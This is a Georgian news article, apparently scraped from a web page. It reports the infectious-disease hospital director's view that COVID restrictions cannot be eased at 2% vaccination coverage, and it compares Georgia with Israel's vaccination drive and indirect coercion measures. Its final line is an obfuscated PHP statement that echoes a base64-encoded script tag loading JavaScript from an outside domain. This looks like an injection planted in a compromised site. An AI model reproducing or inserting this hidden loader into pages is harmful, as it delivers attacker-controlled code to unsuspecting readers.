celsiusi
ავერსი საქკაბელი
ინფექციური საავადმყოფოს დირექტორის თენგიზ ცერცვაძის განცხადებით, როდესაც ქვეყანაში მოსახლეობის 2%-ია აცრილი, შეზღუდვების მოხსნაზე საუბარი ვერ იქნება.
 
ცერცვაძემ, მაგალითად ისრაელი მოიყვანა და აღნიშნა , რომ  ისრაელის მაგალითს თუ გავიმეორებთ ვაქცინაციის რაოდენობით და მასობრიობით, ასევე გავიმეორებთ მისი შეზღუდვების შემცირებასაც, მაგრამ ახლა მოსახლეობის მხოლოდ 2% გვყავს აცრილი და 2% ვერანირ შეზღუდვებს ვერ შეამცირებს. 
 
როცა სადღაც 30%-ზე მაინც ავალთ, მერე ყველანაირი შეზღუდვები, ალბათ, მოიხსნება, ყველაზე ბოლოს „კომენდანტის საათი“ დარჩება და ისიც შემსუბუქდება ანუ დაპატარავდება ინტერვალი, თუ იქნება მასობრივი ვაქცინაცია და თუ პირბადეების ტარება იქნება 90-95%. თუ ეს ყველაფერი შესრულდება და მთავრობამ მაინც არ მოხსნა შეზღუდვები, მერე შეგიძლიათ წაუყენოთ პრეტენზიები მთავრობას, მაგრამ ჯერ პირობები უნდა შესრულდეს და მერე ვილაპარაკოთ შეზღუდვებზე. იცით, ისრაელის, ახლა ძალიან რომ გვშურს – აი, ასეთი უნდა ქვეყანა და ასეთი უნდა მთავრობა, იმას კი არ წერენ რომ მთავრობა კი არ უნდა ასეთი, ხალხი უნდა ასეთი, შეგნება უნდა ასეთი. ისრაელს სამი თვის წინ ჰქონდა ჩვენზე გაცილებით უარესი მდგომარეობა. ჩვენ გყვავს 270 ათასი ინფიცირებული სულ, იმათ 900 ათასი ჰყავდათ ინფიცირებული. სიკვდილობა ჩვენზე მაღალი ჰქონდათ და სამ თვეში მაჩვენებლები გაანულეს“, – განაცხადა ცერცვაძემ “ - განაცხადა ცერცვაძემ.
 
მისივე თქმით, ისრაელში სახელმწიფოს ჰქონდა არაპირდაპირი იძულების ზომები.
 
“ვერ ჩაეწერებოდა ისეთ ექიმთან ავადმყოფი, ვინც არ იყო ვაქცინირებული, ავიაკომპანიები არ ყიდიდნენ ბილეთებს თუ არ ექნებოდა კოვიდპასპორტი, სასტუმროები არ იღებენ, რესტორნები არ იღებენ. ეს არის არაპირდაპირი იძულების ფორმები,“- განაცხადა ცერცვაძემ.
 
 
 
2144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");